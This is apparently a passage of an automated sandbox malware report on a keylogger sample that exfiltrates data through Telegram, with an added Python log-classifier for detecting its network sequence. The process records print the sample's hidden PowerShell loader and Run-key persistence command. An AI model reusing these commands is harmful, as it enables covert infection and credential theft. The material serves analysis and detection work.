            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknown | HTTPS traffic detected: 185.98.5.168:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: C:\Users\user\Desktop\Torpernes.exe | Code function: 0_2_00405200 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
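The network evidence above follows the Snake Keylogger exfiltration sequence: a public-IP lookup against checkip.dyndns.org with a hard-coded MSIE 6.0 User-Agent, a country lookup against reallyfreegeoip.org without any User-Agent, and finally a multipart POST to the Telegram Bot API (`/bot<id>:<token>/sendDocument`). The following is an added example, not part of the Joe Sandbox report or of the sample, that runs that logic over constructed proxy log lines: it classifies each request into a stage, redacts the bot token (which is a live credential for the attacker's bot and should never land in a ticket or SIEM field in full), pulls out the chat_id, and reports whether the full three-stage sequence was observed. The log format, the bot id, the token and the chat_id in `SAMPLE_LOG` are invented for the example; only the hostnames, paths and User-Agent string come from the report.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hard-coded User-Agent on the checkip.dyndns.org requests in the report above.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
# Telegram Bot API path layout: /bot<bot id>:<token>/<method>
TELEGRAM_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]{30,})/(\w+)$")
# reallyfreegeoip.org lookup of a single IPv4 address: /xml/<ip>
GEOIP_RE = re.compile(r"^/xml/(\d{1,3}(?:\.\d{1,3}){3})$")

# Constructed proxy log lines ("METHOD URL USER-AGENT"; "-" means no User-Agent header).
# Bot id, token and chat_id are invented placeholders, not the values from the report.
SAMPLE_LOG = [
    "GET http://checkip.dyndns.org/ " + LEGACY_UA,
    "GET https://reallyfreegeoip.org/xml/203.0.113.7 -",
    "POST https://api.telegram.org/bot1234567890:AAHexampleTOKENexampleTOKENexample12345"
    "/sendDocument?chat_id=1111222233&caption=test -",
    "GET https://www.example.com/index.html Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
]


def classify(method, url, user_agent):
    """Map one request to a stage of the stealer's network sequence, or None."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    if host == "checkip.dyndns.org" and user_agent == LEGACY_UA:
        return ("ip_lookup",
                "checkip.dyndns.org with the hard-coded MSIE 6.0 / .NET CLR 1.0.3705 User-Agent")
    if host == "reallyfreegeoip.org":
        m = GEOIP_RE.match(u.path)
        if m:
            note = " (no User-Agent)" if user_agent == "-" else ""
            return ("geo_lookup", f"country lookup for {m.group(1)}{note}")
    if host == "api.telegram.org" and method == "POST":
        m = TELEGRAM_RE.match(u.path)
        if m:
            bot_id, token, api_method = m.groups()
            chat_id = parse_qs(u.query).get("chat_id", ["?"])[0]
            # Never record the full token: it is a credential for the attacker's bot.
            redacted = f"{token[:4]}...{token[-4:]}"
            return ("telegram_exfil",
                    f"{api_method} by bot {bot_id} (token {redacted}) to chat_id={chat_id}")
    return None


def analyse(lines):
    """Return the matched stages in order plus whether the full sequence was seen."""
    findings = []
    for line in lines:
        method, url, user_agent = line.split(" ", 2)
        hit = classify(method, url, user_agent)
        if hit:
            findings.append(hit)
    # Snake Keylogger's order: public IP first, then geolocation, then upload to Telegram.
    expected = ["ip_lookup", "geo_lookup", "telegram_exfil"]
    seen = list(dict.fromkeys(stage for stage, _ in findings if stage in expected))
    return {"findings": findings, "exfil_sequence": seen == expected}


if __name__ == "__main__":
    for stage, detail in analyse(SAMPLE_LOG)["findings"]:
        print(f"{stage:15} {detail}")
```

The User-Agent check matters: plenty of legitimate software hits checkip.dyndns.org, but the MSIE 6.0 / .NET CLR 1.0.3705 string is what this sample sends, so matching on the pair keeps the rule specific. The geolocation hit has no User-Agent at all, which is what the report's "HTTP GET or POST without a user agent" signature is keying on.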

            System Summary

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Contentious.exe
            Source: C:\Users\user\Desktop\Torpernes.exe | Code function: 0_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Torpernes.exe | File created: C:\Windows\resources\0809
            Source: C:\Users\user\Desktop\Torpernes.exe | Code function: 0_2_0040646E
            Source: C:\Users\user\Desktop\Torpernes.exe | Code function: 0_2_00404A3D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0457EAD8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0457F3A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0457E790
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0040646E
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_00404A3D
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_00156108
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0015C190
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0015B328
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0015C473
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_00156730
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0015C754
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0015F778
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_00159858
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0015CA34
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_00154AD9
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0015BBBA
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0015BEB7
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0015E431
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_00153578
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0015D7F0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0015D7E0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2042B0E0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2042C3EC
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20514F11
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB7588
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB0D60
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB3288
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBF8C9
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBF8D8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB08F0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBF480
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB0491
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBC4A8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB04A0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBC4B8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB0040
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBC050
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBC060
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBF471
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBBC08
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBF018
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBF028
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB0023
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBD1C0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB6DF7
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBD1B0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBCD58
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB0D50
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBCD68
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBC901
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB0900
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBC910
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB4924
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBDEC8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBAEEF
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB3284
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBDEB8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBDA61
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB7E78
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBDA70
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBD609
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB6E00
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBD618
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBEBC1
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBEBD0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBBBF8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CB77A8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBB7A0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBB7B0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBB348
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBB358
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBE768
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBE778
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBAF00
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBE310
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_20CBE320
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23829FB0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382CBD0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23828B00
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382BF30
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382B290
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_238236D8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382A600
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382D218
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382DA48
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382C580
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_238285B0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23820D48
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23820498
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382B8E0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382AC48
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23829FA0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382CBC0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_238243D8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23826FE8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23826FF8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23826713
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23826720
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382BF20
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23823350
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23823360
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23826B69
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23826B78
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382B281
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_238262B8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_238262C8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382D20A
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23825A08
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23825A18
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23825E60
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23825E70
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_238285A0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_238255B1
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_238255C0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382A5F0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23827D00
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23825138
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23825140
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23828148
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23828158
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382C570
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23820488
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23827898
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_238278A8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382B8D0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_238208E1
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_238208F0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23827CF0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23820007
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382AC37
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_2382743F
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23820040
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23822848
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23827450
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_23822858
            Source: Torpernes.exeStatic PE information: invalid certificate
            Source: Torpernes.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/11@4/4
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_004044C2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044C2
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
            Source: C:\Users\user\Desktop\Torpernes.exe File created: C:\Users\user\AppData\Local\Temp\nsb2E4F.tmp
            Source: Torpernes.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\Torpernes.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Torpernes.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Contentious.exe, 00000006.00000002.2944378842.000000002100F000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.000000002102D000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.000000002101E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Users\user\Desktop\Torpernes.exe File read: C:\Users\user\Desktop\Torpernes.exe
            Source: unknown Process created: C:\Users\user\Desktop\Torpernes.exe "C:\Users\user\Desktop\Torpernes.exe"
            Source: C:\Users\user\Desktop\Torpernes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Contentious.exe "C:\Users\user\AppData\Local\Temp\Contentious.exe"
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
